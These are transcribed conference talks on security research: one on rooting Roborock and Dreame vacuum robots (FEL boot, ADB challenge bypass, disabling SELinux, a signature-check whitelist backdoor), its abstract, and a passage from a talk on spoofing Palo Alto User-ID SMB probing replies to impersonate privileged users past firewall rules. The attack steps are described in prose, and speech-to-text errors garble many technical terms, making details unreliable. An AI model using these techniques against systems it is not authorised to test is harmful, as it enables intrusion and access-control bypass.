de-ophuscated it so I could get access to Overseerio, for example. And the other way was that I booted into a single user mode and modified files there so that I had SSH access. Back then, I didn't publish the methods for some time as I assumed that Roborock would lock them down as soon as they know about them. So this is what you had to do to get root access. You had basically to solder wires to the test pads to get in the UART port. With rooting, we made some observations over time. Every time we published a method, it got blocked. And here are some examples for blocking. For example, local updates which we published in 2017 were blocked in firmware updates 2018. The root password message which I published in 2019 was blocked in newly produced devices back in 2019. And the UBIT bypass was fixed for new models in 2020. So there was one model which came out at this time and it was already patched. This means basically that all current public methods are basically blocked. All right. Let's talk about the development of Roborock models over time. So we only will talk about global models. There are way more models like in Mainland China, but in this case, I just want to talk about global models. On the left side, you see the size of the RAM. On the right side, you see the size of the flash. And this becomes more important later. In 2016, Xiaomi released the V1 which was basically an OM product by Roborock. Roborock released the S5 under their own name in 2017. In 2019, we saw more devices like Roborock S6 and SXPU and the Xiaomi M1S which was again an OM product. In 2020, we saw the S4, S4 Max and S5 Max and their flagship model, the S6 Max-V. And this year, we saw the Roborock S7. If you add the price, then you see that higher prices do not really correlate with better hardware. Also, one thing which we noticed is that manufacturers are recycling hardware in different models. For example, the Xiaomi vacuum robot has more or less the same hardware as the Roborock S4. The Roborock S5 and the Roborock S6 are more or less the same. And as you can see on the bottom, the S6 pure, the S4 Max, the S5 Max and the S7 have the same mainboard and more or less the same hardware too. However, the prices are very different from them. As a conclusion, one thing which we noticed is that the hardware gets weaker over time despite the devices getting more expensive. Roborock has two vacuum cleaners which are special. Both of them contain a camera which is a little bit more critical in regard to privacy. The first one is the M1S which was released in 2019. Instead of using an all-winner chip, this one uses a Rockchip Quadcore. It has 500 to 5 megabit of RAM, 4 gigabit of EMMC. It has a LiDAR sensor which we already know from other models, but in addition to that it has also an upward-facing black and white camera. It does have an ultrasonic distance sensor in the front and infrared sensors. To give you a perspective of the camera, I recorded this video on a root and vacuum cleaner and I used these three for that. The second model with the camera is the Roborock S6 Max V. This is currently the flagship model. It was released in 2020 and contains a Qualcomm OctaCore SOC. It has 1 gigabyte of RAM, 4 gigabyte of EMMC flash. In addition to the LiDAR, it has also two color cameras in the front which are illuminated with infrared and it has the usual infrared sensors. In the bottom left you can see the stereo camera of the device. In the bottom it has the infrared illumination so this device we'll see in the dark. On the right you find screenshots from the app. As you can see the vacuum cleaner can actually detect objects and can avoid them. This is also quite interesting again for privacy reasons. If you look at the software of both devices, both of them are very similar. They use Android as the operation system and the controlling software for the robot is very similar to the previous models. The software access the cameras via the video for Linux subsystem. There are a lot of libraries which are used but the more interesting ones are OpenCV, OpenCL and the TensorFlow Lite. Roborock learned from the past and added a lot of security measures to their device. For example, Secure Boot is enabled and they make use of the replay protected memory block as a downgrade protection. The system partition is integrity protective of the M-Barity so we cannot modify it. Also a lot of partitions are encrypted with looks. In particular all the application specific programs are stored on an encrypted partition. The keys for this partition are stored in OPTIM which is using ARM Trust Zone but there are more security features. For example Roborock added a kernel-based verification of binaries. All binaries before we get executed are checked for a correct signature. This means we cannot really put any custom binaries on through the system. Also they cite and encrypted the firmware updates. This time each of the firmware versions has a different key. The master keys itself are stored in OPTIM which is using Trust Zone. Interestingly they modified the IP tables binary. Traditionally what we did for routing we removed all the firewall routes as soon as we root the device so we could access SSH and other tools. However Roborock removed the ability of IP tables to flush or delete routes so as soon as routes are added to IP tables we cannot remove them anymore. We also locked UART so we cannot use UART to get route access. We had some partitions which are especially interesting on these devices which we need also later for our route. There's the app partition which contains the device credentials and some other configuration files. This partition is not protected by loops or the invariity. Then we have two copies of the system partition. One of them is the active one, one of them is the passive one. Both partitions are protected with the invariity so we cannot modify them. Then we have two application partitions again one active and one passive copy which are encrypted with loops. However we are not integrity protected. We have a reserve partition which contains the calibration data. This one is again encrypted and we have the user data partition which contains lock files and the maps and it's again encrypted with loops. So let's talk about the new routing methods for Roborock. Currently there are three models of vacuum cleaners which have no public route. This is the Roborock S7 which came out this year, the M1S and the Max-V. Let's start with the Roborock S7. So the Roborock S7 has more or less the same mainboard as the S5 Max, S6 Pure, etc. However the problem is that they patched U-boots so we cannot use UAT anymore to route it. In addition to that the router-fes is a read-only squasher-fes so even if you have access on a device we cannot modify the partition. I developed a new method for this device which is FEL routing. This method doesn't require any soldering however it requires still that the device is disassembled. This method also automatically patches the router-fes and enables SS8 and it applies to all current NAND based Roborock models. In order to find a new routing method we need to reverse engineer the PCB. We knew already where the UAT pins were but they are useless after they blocked this functionality. However all the all-winner socks have the so-called FEL mode. FEL mode is a low-level mode which allows the flashing of the device and it is burned in the SOC ROM so it cannot be modified. The idea is to load a custom OS via FEL. There are two typical methods to trigger the FEL mode. First we can somehow disable the flash chip for example by grounding the clock. However this method might be risky if you don't do it correctly. And the second one is that we can pull the boot mode pin or trigger the FEL pin. The problem with this is we need to figure out where this pin is. So I got myself a spare PCB and did destructively disolder the SOC chip. After I did that I probed all the pins and was able to find an interesting pin for example like JTAG or the boot mode selection. And by having this we can use it to trigger the FEL mode. So how does this approach actually work? The challenge for all-winner socks is that the NAND reports are proprietary so we cannot use a mainline kernel or mainline U-boot. So my approach was the following. I extracted a kernel configuration from a Roborow kernel. I created my own InetRAMFS with drop-year SS8 keys and some tools. I compiled a minimal kernel using the Nintendo NES classic sources. The Nintendo NES classic uses the same chip as the Roborow vacuums. I created my custom U-boot version with an extracted Roborow configuration and I triggered the FEL mode by porting the TPS 17, this is the boot selection pin, to ground. Then I loaded the U-boot kernel and the InetRAMFS into the RAM and executed it. After I did that my customer was booted, patched automatically the rootFS and I had root. How does the pattern process exactly look like? First we need to boot into the FEL image, then we need to just decompress the squashFS. After that we patched this image, for example we installed the ultra-skey file and the custom drop-year server, we compressed the image again and overwrite the partition with the new image. And as a result we have SSH access and root. So what are the advantages of this new method? Well first we don't need any soldering anymore. The chip can short the boot pin one time and we're good to go. It's a very simple process and it also allows to restore brick devices which was not possible before. And also one important thing is that it can be used for all our winner-based vacuum cleaners. So now that we have root for the Rubarok S7 let's take a look at the camera-based models. So if you want to root the M1S and the Max-B we have some issues. First all the ports are closed or fire-bolt. The fire systems are encrypted or integrity protected and the USB interface is also protected with some custom ADBD. So to get root access we need to have a layered approach. First we need to break in via USB. Then we need to disable the SE Linux and then patch the application partition. And as an important note while it might be possible to root these devices it might be impossible for many people. So don't expect it to be that easy as for previous models. All right level one get ADB shell. If we connect over USB we need to do a challenge response authentication. This application is based on a window secret which we don't have. So Rubarok has it properly somewhere in a database. The secret is also device specific. Also the ADB is controlled over a special configuration file which we might need to modify. All the files are stored under default possession and are thankfully not protected. So our idea is the follows. First we need to connect to the flash for example via in-system programming or by disordering it. Then we need to create or extract the window secret and then we use a tool to compute the challenge response. So for the M1S we can do in-system programming by soldering small wires on the bottom side of the PCB. The pictures which you see here are from my experiments where I used the SD card as a replacement for the for the EMMC flash but the pinout is more or less the same. That's an important warning. If you don't know what you're doing you likely will break your device. So I tried both methods but I figured out ISP is can be sometimes tricky. So what I did instead is I used an adapter to read out a chip which requires reflow soldering to remove the chip and rebolling and then resoldering it again. Okay what are the results of level one? I have a more detailed how-to on my website. However what I did here is I set the window secret to all use. After I connected the device via USB I needed to extract the serial number from it. So I ran ADB devices. The serial number is required for the challenge response process. In the next step I asked the device for a challenge. So as you see here I got like a random string back which is the challenge. In the next step I used the tool Vindar to generate a response. So at this point I want to thank Eric Willman for his support and help to create this tool. Before that I was computing the response manually but he extracted in Gidra the function and just put it in a C program so now we can just run it from the shell. The result of this program is basically the response and as soon as we have that we can just run any commands which we want to do as you see here. We have no show access but as AlienOx is still enforced. As AlienOx will prevent us from doing specific things even if we are rude. For example the network access is blocked and we don't have any access to the dev directory so we cannot mount partitions or access devices. However we can do two things. We can do bind mounts and we can issue the kill command. So the idea to disable as AlienOx follows. First we copy the Mio directory to a temporary location. The Mio directory contains the Xiaomi cloud client which is launched by the watchdog. The watchdog has all privileges and it makes sure that if the Mio client is crashing that it gets restarted. In the next step we replace the Mio client with a bash script which disables as AlienOx. In the next step we mount this temporary location back to the original location. If we now kill the Mio client the watchdog will restart our bash script instead of the real Mio client. So hopefully as AlienOx gets disabled. Let's take a look if this works also in practice. In this case what we need to verify first that as AlienOx is actually enabled. So with the get-in-post command we get the response that it's enforcing. In the next step we check the process ID of the Mio client process. So we see the original process is running. Now we copy the Mio folder to a temporary location and write our bash script into the client. The client is not an alpha anymore instead it's a bash script. Now we bind mount this folder to the original location and we kill the Mio client. And now hopefully the bash script is executed and we can check it with get-in-post and we see it's permitted so now as AlienOx is disabled. Let's do level three. We have now full root access however it's only temporarily so as in the moment when we restart a vacuum cleaner we lose root access. So the good thing is the app partition is not integrity protected. If you modify information is there then we don't have any issue. By modification of a few scripts we can disable as AlienOx and start dropper on a different port. The reason why we want to start dropper on a different port is that IP tables still blocks the port 22. As I mentioned before Ruborock modified the IP tables binary so that we cannot delete roots but instead we can just use a different port. We are still limited by the elf binary signature verification. However we found a backdoor in this function. If you give the binary a particular name then it is a white listed. We can even point symbolic links to this binary. Many thanks again to Eric Oman at this point which helped me to figure that out. Let's do the demo again. I want to run Valetudo my robot. Valetudo is a cloud replacement which allows to control your vacuum robot locally. As you can see here I downloaded the VGET into a temporary directory and I tried to launch it. However I got a segmentation fault. Typically segmentation faults happen if some libraries are broken. However when I was looking at the kernel log I saw that the very far elf function kicked in and stopped the execution. Now let's try a trick with the white list. We renamed the Valetudo binary to the white listed name. As soon as we run the white listed name you see Valetudo is starting happily and everything works. Now we have four root accesses and can run our own binaries on the system. Some other ideas for this vacuum cleaner. We can ask Opti nicely to decrypt firmware updates for us. As we have root access and as we have a secure system Opti will happily decrypt firmware updates for us. Also we can access the cameras directly. For people who understand how TensorFlow Lite works you can take a look at the machine learning models of the vacuum cleaner. I myself have no idea how this works so I didn't take a look at it. And we can take also a look at the error back doors. So there are some hidden functions which wait only to be explored. So as a summary about Roborock well we have an easy method to root the S7 vacuum cleaner and some other models. We have also a rooting method to root the M1S and Max-V. However this method is dangerous in the likely brickier device. It's mostly only feasible if you have the equipment and experience. So regard this root as a proof of concept and that the technique can root its devices however I don't think that it will be useful for a lot of people. As a general recommendation I think at this point I would say that we should try to avoid new Roborock models if you want to have root. Part of the reason is that they lock down their systems and the other reason is that due to the weaker hardware we will run into resource issues if you try to run custom software onto them. All right so we need a new alternative and the great thing is there's a new player in the field of vacuum cleaners which is Dreamy. Dreamy is the great alternative for us. They released their first model back in 2019 and they produce OM products also for Xiaomi. They have four different kinds of vacuum cleaners which we produce. The Xiaomi One C and the Dreamy F9 are V-Slam based models so they have a camera which is looking on the ceiling and they create a map via bed. The Dreamy D9 has a more traditional LiDAR sensor similar to the Roborock devices. The Xiaomi One T has a V-Slam and time-of-flat camera so it can scan, can pretty scan objects which are in front of it. And the current flagship model is the Dreamy L10 Pro which has LiDAR, a line laser and a camera. All of these devices are based on various all-winner socks. Dreamy uses for their device a custom Android which is mostly based on the TINA Linux which is provided by all-winner. The company developed their own robotic software which is Ava. So let's take a quick look on what kind of sensors you can access on these devices. These pictures were recorded on rooted vacuum cleaners. As you can see here there's a camera which is looking onto the ceiling and if you root the device you are able to access these cameras. The Xiaomi One T has an additional camera in the front which is a time-of-flat camera. With that you get a point lot of objects which are in front of the vacuum cleaner. The Dreamy L10 Pro uses line lasers to detect objects in front of it. As you can see on the right the device creates two laser beams and if there's any object in front of the device the laser beam gets distorted. The camera will pick up the distortion and will determine how far away the object is. So let's talk about how we can root Dreamy. The rooting of the device is surprisingly easy. So I bought my first Dreamy robot when I was in China back in 2019 and it took me only a couple days to root the device. The good thing is that all the devices have the same debug connector which can be accessed without breaking any warranty shields. I did do a lot of reverse engineering and I was able to extract the key material and firmware. I also did reverse engineering with ways to create proper FEL images. With the help of the Banana Pi tools which are also based on all-winner socks I was able to create images which you can use to flash the devices. To flash the device you need a portion to use a Windows-only software which is Phoenix USB. There might be also ways to flash it over Linux but I didn't investigate that. So how does this debug interface look like? The debug interface has two times eight pins and it has a pitch set of two millimeters. The two millimeters are way smaller than the typical jumper wires which you get. If you plan to connect it with wires then make sure that you connect to the right pins. The debug interface gives us a couple of interesting interfaces. For example we have USB, we have UART and we have the boot selection pin. I saw that there's also another UART there and likely JTEC but I didn't investigate further. To easily root the device we created custom PCBs which enable you to easily access the USB and UART. There's a simple version which just gives you a USB and gives you the UART headers and there's an advanced version which has an on-board serial controller. I want to thank at this point Ben Halfrich who created these boards in KiCat and at the bottom of the slides you find a link to the Gerber files. Here are some examples how you can connect them. For example for the PCB you can insert it and you just have to make sure that you have the right orientation that you don't try the board and you can just connect USB and UART. If you don't have this board you can also use jumper wires but you need to be a little bit more careful and make sure that the connection is properly done. On the bottom there's a diagram how you need to connect everything. Let's talk about some interesting findings which I saw when I reverse engineered the Dreamy firmware. So all the devices have an auto SSH backdoor. This can be triggered from the cloud. What this will do is it will create a reverse SSH shell to one of Dreamy servers. The interesting thing here is that they hard-coded the credentials to the server which is public facing. The bigger problem is that this user which is used to create this reverse SSH has sudo writes on that server and it appears with the service used for development. I don't really know why we did that but this seems like a really really bad idea. A scary thing which I found were the startup debug scripts. These scripts were downloaded over FTP from some personal developers NAS. These scripts are also executed at boot up for some devices. The same debug scripts are also uploading log files onto that NAS and the admin credentials are in plain text in that script. All of the vacuum cleaners have predictable root passwords. For example, devices with production firmware you can compute the root password from the serial number. For devices with debug firmware there's only one valid password. So knowing that it might be a bad idea to connect your vacuum cleaner directly to the internet. I found also a lot of chatty functions. The cloud app allows the execution of some debug functions. For example, someone can trigger the recording in uploads of pictures or the recording in uploads of camera records for devices with cameras. And the device also produces a lot of log files. The only way to prevent this uploads is basically rooting. I don't know if these functions are used on the regular base by the developers but the fact that these functions exist is kind of scary. As a summary about Dreamy, the devices are cheaper than Roborock and they have also performant hardware. This makes the devices the perfect target for rooting. As I'm working on the rooting for quite a time already, I was able to work with the developer on the support on the devices. So I'm happy to announce that all Dreamy devices so far are fully supported by Valetudo since April 2021. All current models can be rooted without any soldering and this also applies to all devices released before August 2021. There will be some devices in the future. We don't know yet if they are rootable or not but we will figure out very soon. The Dustbidder is a website to build your own custom robot firmware. You can create reproducible builds. It's easy to use especially for Windows users. In the past, we had a lot of trouble with Windows and Mac users where building firmwares were kind of tricky. So this tool kind of makes it way easier. The Dustbidder works for Dreamy, Roborock and Biome devices and is a perfect alternative to local building. However, if you don't trust it, the tools will be still published on GitHub. You find Dustbidder under builder.don'tvacuum.me. At the end, I want to thank a few people which supported me in doing this presentation and doing the research. I want to thank Ben Halfrich, Carolyn Gross, Cameron Kennedy, Danny Wiggema, Eric Ullman, Gavarno Beer and Zoan Bayer. If you have any questions, feel free to contact me by email, telegram or Twitter. Visit my website for any additional information or meet me here at Defcon if you're around. If you happen to have a Dreamy robot or plan to get a Dreamy robot, I have a couple spare PCBs with me which you can pick up for free. Thank you very much and have a nice con.
|
Vacuum robots are becoming increasingly popular and affordable as their technology grows ever more advanced, including sensors like lasers and cameras. It is easy to imagine interesting new projects to exploit these capabilities. However, all of them rely on sending data to the cloud. Do you trust the companies promise that no video streams are uploaded to the cloud and that your personal data is safe? Why not collect the dust with open-source software? I previously showed ways to root robots such as Roborock and Xiaomi, which enabled owners to use their devices safely with open-source home automation. In response, vendors began locking down their devices with technologies like Secure Boot, SELinux, LUKS encrypted partitions and custom crypto that prevents gaining control over our own devices. This talk will update my newest methods for rooting these devices. The market of vacuum robots expanded in the past 2 years. In particular, the Dreame company has recently released many models with interesting hardware, like ToF cameras and line lasers. This can be a nice alternative for rooting. I will show easy ways to get root access on these devices and bypass all security. I will also discuss backdoors and security issues I discovered from analysis. You will be surprised what the developers left in the firmware. REFERENCES: Unleash your smart-home devices: Vacuum Cleaning Robot Hacking (34C3) https://dontvacuum.me/talks/34c3-2017/34c3.html Having fun with IoT: Reverse Engineering and Hacking of Xiaomi IoT Devices https://dontvacuum.me/talks/DEFCON26/DEFCON26-Having_fun_with_IoT-Xiaomi.html https://linux-sunxi.org/Main_Page
|
10.5446/54188 (DOI)
|
Hi and welcome to my talk. Hi, I'm Domain Slagstief. Please need my access to FeeLand 2. It's about trick and fire using the capabilities into applying security policies to arbitrary IPs on the network. My name is Justin Perdog. I'm a pentastor at CyberDefense. I enjoy drinking a coffee beer and a long morning in my free time. As you might imagine, I'm into hacking stuff, but also automating stuff. If you ever want to reach me, you can contact me on Twitter. Today, we're going to talk about a feature in Firewalls that allows me to apply security policies to my IP. To start off, we're going to talk about an assessment where I initially discovered this was the thing that Firewalls do. Then, I'm going to shortly cover how traditional network segmentation implemented and how the tool is implemented from the vendor. Then, I'm going to cover how I build a tool that allows me to respond to these requests and that I was able to bone to different Firewall vendors. Lastly, we're going to close off the talk by speaking about the national law school research and some conclusions and takeaways from this research. To start off, let's tell you about a day in the life of a pentastor. I was at the Tunel project with my colleague Thijs, working towards getting the main access within the network. Now, I'm doing my thing. At some point, we wanted to move around some files between a host and our workstation within the network. The easiest way to do this, I thought, was to spin up an SMB server using impact as implementation. While doing so, out of nowhere, someone tried to authenticate to me. The username included something like Pallault to user ID. While it was authenticating to me, the impact SMB server choose some errors referring to unsupported DC RPC op-num code tool. Besides that, it wasn't like a one-off thing. The user kept authenticating to me over and over and over. You know, honestly, when this happens, you start to relate the credentials. Luckily for me, when I looked at my bloodhound data, this user was also in domain admin. You rate stuff, you post some hosts, get credentials on those, do your thing, and before you know it, the job's done right. Well, yes, but actually no. I wanted to figure out what I was actually doing on the hood. I started googling a bit around using the username as a reference and I figured out it was a feature that allowed firewalls to probe clients on the network and gather information about lockdown users. So I verified this with the client. If the NDQC feature and it told me yes, we do. We used to apply security policies in the network. I googled around a bit more. I figured out most of the articles that describe this feature from a fancy side of things mostly talked about that it's SMB based and that it authenticates you. They didn't look at it any further to know how would we potentially return information, for example. So I started to look into it a bit more. First off, I started to look at the packet capture, often the process that authenticated to me. What I saw is that the client that probing me was connected to the IPC share. From there it requested a file called WSVC file and then executed a function called netwstiusernume function which at the time I presumed was a request to collect information from users. To fully understand what's going on here, I wanted to step back and talk about how namepipes are implemented within Windows. So in Windows there are these three default administrative shares. There's a $$ share. This share basically gives rights to the entire disk. Depending on how many disks you have in your system, you would have multiple of these shares corresponding with the drive letter associated with the drive. Besides that there's also the appmin share. The appmin share basically gives access to where the folder is located from the installation disk. And besides that, there's also a special share called the IPC share. IPC stands for inter-process communication. The share itself does not give access to files, but it actually gives access to processes running on the system. It gives access to these processes by exposing them through namepipes. So let's look at an example here. Here we have Bob, Bob the namepipe, and it's giving access to the build.exe by exposing it on the IPC share. This means if you want to read and write data to the build.exe you would do this by talking to Bob. You can also ask Bob to execute specific functions on the build.exe. Executing functions this way is often referred to distributed computing environment slash RSC remote procedure calls or DCE RPC for short. So we just learned right this process which files do connect to you on the IPC share and try to collect information about locked on users. This pretty much is the same thing in what I saw on the assessment and something was at the end of the test getting to me and trying to enumerate locked on users. To understand why this process was an instant in attack, we first take a step back and look at traditional network segmentation. We'll cover how this is traditionally implemented and why this is just hard and complicated over time. Then we'll also show how an iterative solution could help with this. I do would like to know if this won't be a comprehensive guide on VLANs themselves or networking it would just be enough to get a basic understanding of how VLANs work. So here is an example of a new network, presumably from a new company. Here everything is connected to the same switch and everything can talk to each other because this is a flat network. Then the company has a pen tester, it comes along and performs an assessment. You know, you post some hosts and presumably when writing a port you would recommend some things to implement some form of network segmentation. So the client starts to think about this and they get the idea to implement some form of sounds. This example a blue Kaliant zone and a yellow server zone. The idea here is to not allow traffic to flow freely between the sounds and restrict it by default. To do this the client would presumably use VLANs. So you know, how would these VLANs work? So let's take these four ports which for example, these four ports configured with two different colors, blue color and yellow color. Basically what this does the blue color represents VLAN ID 2 and the yellow color represents VLAN ID 1. Whenever device is connected to a blue port it will only allow traffic to flow to other ports which are also blue. Meaning if we were to connect four physical devices to the same switch they will only be able to see and talk to each other with the conspiring color. Configuring ports this way is also referred to on tech ports. But you know a switch doesn't actually use colors it's a net requirement goal so how does it do this on the hood? Well whenever a Ethernet frame passes through a switch port which is configured with a specific VLAN ID it will edit this Ethernet frame to include an extra header. The 801.1Q header also referring to a VLAN ID header. Which means whenever the Ethernet frame passes through the conspiring VLAN ID is added to the Ethernet frame. Then the switch will ensure that only traffic with a specific VLAN ID is able to reach other ports which have this conspiring VLAN ID. This isn't all the switch you can do though. The switch can also be configured using different type of ports called tech ports. So let's take another example with two switches. Here we have the same VLAN ID as the blue one and the yellow one. And let's say we have a device connected to switch one on a blue VLAN and wanted to talk to a device on switch 2 also on the blue VLAN. To do this what we would do is configure two ports on a conspiring switch as tech ports. What it does is allow the traffic from the conspiring VLANs to flow between the switches. But it won't allow the blue VLAN to reach the yellow VLAN even though it's patched over the frame port. Having all these devices segmented from each other is great for security but not too much for productivity. You can use this device such as a firewall to allow segmented access between these zones. For example, you can tell the firewall to allow clients from the blue zone to reach the servers in the yellow zone using a specific port. This is the very basic concept of network segmentation using VLANs. And it's pretty easy to understand within such a small scale network. But you know, complices usually don't have one VLAN or two, they have multiple. And you know, after some basic rules they're initially set up, they grow over time and before you know it, there's a whole bunch of rules. Nobody knows what's going on anymore. Everything is on fire and everybody is screaming. So you know, this is where the alternative solution comes in. One of these solutions being Palo Alto User ID a firewall SSO solution, as you might call it. Basically what it does, Palo Alto User ID creates a use to IP mapping and then this use to IP mapping is able to allow you to see with visibility within the network, you know, which user is doing what and allows you to create firewalls for specific users. The Palo Alto User ID can be configured to collect information from multiple sources. For example, Active Directory Authentication Logs, Syslog servers and the one which we're going to talk about today, Client Prombing. So by using this SSO feature, instead of to rely on traditional ways of segmentation, you could say a specific user in a blue VLAN is allowed to access specific server within a yellow VLAN. Even though there are other users within the blue VLAN, they're not able to access the server in the yellow VLAN because the almighty firewall figures out who is locked on with online client. Then it's going to dynamically assign a firewall to this specific IP. So after finding out this was a thing, I had two strains of thought. This is happening to me, it was like, you know, this is awesome. The other thought to me was about my hacker, talking in the back of my mind, you know, wait, what? We're going to trust clients through the truthful responses and base our segmentation around that. Seems like a bad idea. So to explain why I thought it was a bad idea, let's lose an analogy to explain my thought process. So in this analogy, I'm staying in a hotel and this hotel has a VIP membership which allows you to buy into it and gain expertise within the hotel. You know, being a chipkater that I am, a Dutch boy, I didn't decide to buy and do this VIP system. So you know, Natalie, the first thing when you do, when you arrive at a hotel, this is the bar right. So when arriving at the bar, I notice there are two fridges of beer. One with one fridge for beer, which I would call less desirable beers and one fridge with the good ones. The only problem here is that the fridge with the good ones has a sign on it which says VIP members only. So even though it says VIP only, I still won't want the good ones. So I walk up to the bartender and ask if I can ask the VIP fridge. The bartender is then going to look at his rulebook and he sees that only VIP members are allowed to access this fridge. Then he's going to look at this user-to-hotel room system and sees that he doesn't know who is currently resigning in my room. He's then going to ask me, you know, who are you? So being an instant-applied allowable assistant that I am, I would just re-responses and tell him that I'm Justin. The bartender is then going to look at his rulebook again and look at a member of the VIP members. And of course, I'm not on the list. He's going to tell me, no, you're not allowed to access this fridge. But you know, instead of giving up, I want one of the good beers. I start to look around the room and I see there's a guy over there in the corner named Steve drinking one of the good beers. So I get this genius idea, you know, instead of saying who I am, let's lie about who I actually am. So I walk up to the bartender again asking to access the fridge. This time using different hotel room number. The bartender then again, you know, look at this rulebook. This is only VIP members allowed to access the fridge. He then is going to look at his use to a hotel room system and sees he doesn't know who's currently residing in his room. So he's going to ask me, you know, who are you? This time, instead of saying I'm Justin, I'm going to lie and tell him that my name is Steve. He's then going to take this information, look at this rulebook and sees, you know, hey, Steve is a VIP member. Of course, you can access the fridge. So, you know, seems like a plausible tech write. The user ID entity feature might not expect us to return false information and this potential allows us to access things we aren't allowed to. As we're figuring out who you want to impersonate, instead of looking at the bar, you could look at active vector data from using blackout and figure out there's a specific group of an X directory which references firewall ACLs. The idea of a text scenario here is basically the same as an app web application might have it. Whenever a web application just trusts client input without validating it, you're usually able to break things within the web app. But the thing is we can only do notice for certain. The user ID system might try to revalidate or correspond the information collected from user probing with other sources such as X directory authentication logs. But we can try to figure it out by looking how the solution is supposedly implemented. So let's start with no for certain, the firewall ACL. Besides traditional VLAN and IP address-based filtering, you can also assign an extra source option within this ACL. This extra source option being either a user or an X directory group. In this case, the firewall only allows members of the VIP group to access specific fridge in within another VLAN. When implementing client probing, you can either use SMB or WMI. The firewall itself only allows probing on WMI, but there's also an agent which allows for both. Since our presumed attack method relies on SMB, we're going to talk only about the client today. The agent itself needs to be installed somewhere on the system within the network. From this place, it needs to be able to access the sources which is tried to collect data from. So in our test case, we're going to use a very simple network design. Everything here is connected to the same VLAN except for the segmented fridge. This, of course, is not a typical corporate network design, but it will do for our demonstration purposes. The parallel to user ID is then installed somewhere within VLAN 1. Since there is going to be able to access the client and as well as the X-Fetched VLAN domain controller. Even though it's called the user ID agent, it's not installed on every host within the network. It needs to be installed on a host which is then able to connect to different sources. You can, however, use multiple agents if you want to, but doing that depends on your network design and the limitations of the software. Now that we understand our network design, let's look at how you would install the agent. When installing the parallel to user of the agent software, you're prompted to use a service account. If you were to able a flat standard X-Fetched user as the service account, it would arrow out because the minimal needed writes are the long-run as a service user rights assignment. Then, depending on the collateral method you want to use, you would then add additional writes to this account. When running the Venom documentation, they actually properly explain how to implement the least privileges, except they sadly don't do for SMB-based client-proving. Meaning that, you know, when this stuff is implemented, you and I both know that this is usually over-privileged with either local admin or in the cases of Dysel, even domain-up in priviless. In the cases that you're using SMB-based probing, the overall security does heavily depend on all the factors within the network. For example, a network access control or general system hardening that will prevent SMB relaying. And now, Paul also even knows this. With multiple places within the documentation where it references the client-proving, that advice you to not use this. Anyhow, after having set up the appropriate writes for the user, you can start to configure the agent. When doing so, you would very easily figure out that you don't need to do much. Both the server collection method and client-proving is enabled by default on both W and SMB. And I think this is a important one to note, because, you know, Palo Alto by default recommends against doing this, but it's enabled by default within the agent. So, if an administrator wants to use the same defaults, he might not only implement a system that is going to spray hashes everywhere in the network. Now, the only thing that you need to do before the client starts, you know, collecting sources for my server or start-proving clients, is to add a network server source, in this example a domain controller. This is all that is required to start to make the agent start probing and collecting resources, but it has another function I would like to cover called caching. So, whenever the agent identifies a user-to-IP match, it will not only forward this information to the firewall, but also store it locally for a specific amount of time. But default this time is 45 minutes. However, this caching timeout does not correlate to the probing interval, meaning even if the collected information was done by probing and it's been cached for 45 minutes, the system will still prep the clients regardless of this caching timeout. Now, we've taken off the configuration of the client itself, we can look at the firewall. So, the first thing we do is just simply add the agent to the firewall. This will enable the firewall to talk to the agent whenever a specific ACL triggers the event to collect information from the user. Then what you would do is you would enable user identification ACLs on the zone where you would want to configure these. Then to allow the firewall to know about users within your server and environment, you would add a LL profile. This LL profile is basically going to link the resources from X-directed to the firewall. Then from this point onwards, you're able to create firewall rules using users as a source. But if you want also use groups, you need to do an additional step. This step being a group mapping. Basically what this does is it's going to take the groups within your X-directed environment and caches members on the firewall itself so it doesn't need to perform an LL query every time a user matches an ACL. Then from this point forward, whenever you create an ACL on the firewall and generate some traffic matching these rules, the firewall will send over a request to the agent as you know who's locked on and if the agent doesn't know, it will start probing us. This example we can see an impunto client performing a ping towards the fridge and you can see the agent starts probing us. So as we now know, instead of three components, there are actually four components in this flow. There's the client in Zlon1, there's the user D agent, the firewall and the fridge which we want to access. So regardless of what we do, the agent is going to collect information from the X-directed tree and store this information to build out its use to IP mapping cache. Then we come along and ask the firewall to access the specific fridge in a segment at VLAM. The firewall is then going to block our traffic until you know, hold up, I need to know who you are because you know there's a user ACL mapping. The firewall is then going to send over this information request to the agent. The agent is then going to look at its cache to see if he knows who you currently are and because he doesn't know, he's going to send over a probing request to us asking, who are you? The only issue being right now is that we currently don't support this. So whenever a request comes in, we throw an error like lol what? Unsupported dcerpc. So at this point I thought, maybe if I implement netwqsa username, nobody will be able to tell I'm a Spider-Man. But before going off building something, I would first like to know what is actually happening on the hood. So we're going to look at some Microsoft documentation and they'll figure it out from there. So again, if you look at a packet from the user, we would see that the probing request tried to access a name pipe called WS-SVC. With a bit of googling around, you could easily figure out that this is actually called the Workstation service remote protocol. Luckily for us, Microsoft has this huge handy PDF which fully explains everything within this name pipe. So when I actually wanted to build something around this, I was kind of looking up against it and I'll build this on scratch. So after asking around internally on our meta-post, I was redirected back to an impact which in hindsight was actually pretty obvious because the REAPME references the specific name pipe we want to implement. When it came down to actually implementing the netwqsa username function, most of the work was already done for me. All the structs for the function to properly function were already implemented in impact as Python classes. Here on the left you can see a simplified version of the request as Microsoft describes it. On the right you can see the class within the impact solution. All I had to do is figure out how I would implement some code which is going to trigger and return information how I wanted to. But before I started extending impact, I wanted an easy way to verify what my code was doing. With a bit of googling, I found this function called netlockdown which is a function written by HarmJourney. This function basically does the same thing as the firewall would do. This allows us to use our code to have and have to rely on a firewall. With the firewall temporary out of the way, I could start implementing things within a packet. I won't bore you with every single line of code that I added, but I would like to share a couple of things that I found out which might be handy if you ever want to implement something similar. So the first thing is whenever, currently whenever in packet we see a probating request, it has no idea how to handle this. So in order for a packet to support this, what we would do is we would add a dictionary within the class which is basically going to link this opnum code to a method which you will define later. This way whenever in packet we see a specific opnum code, it knows which method should handle this request. The next one is that you shouldn't add arguments on the sb server class itself if you want to supply it with clr argument information. To supply this information to the method you're going to use is you would define a function which is going to update the conversion file. If you're doing this within the class itself you can use a dictionary to get this information back you initially supplied on the sb server argument. As you can see here, the values that are initially added on sb server arguments are the values used to return the actual information upon a request. So let's actually look at this in action. Here on the top we can see a PowerShell session with the get-lockdown-user function loaded. And on the bottom we can see a boot client with our modified version of n packet. Whenever we send off a get-lockdown request to the boot client you can see the information which was supplied on sb server is now returned to the request. Meaning that we're currently able to fully respond to these programming requests. So the issue being that we currently didn't support it is now gone. So we return the spoof user information. The agent is then going to take this information and add to this cache. And then afterwards we'll forward this to the firewall. The firewall is then going to use the information and either give us access to the fridge or not, depending on the information we supplied. You know, which is great. Everything is in place for this attack. So let's take this and apply it to the 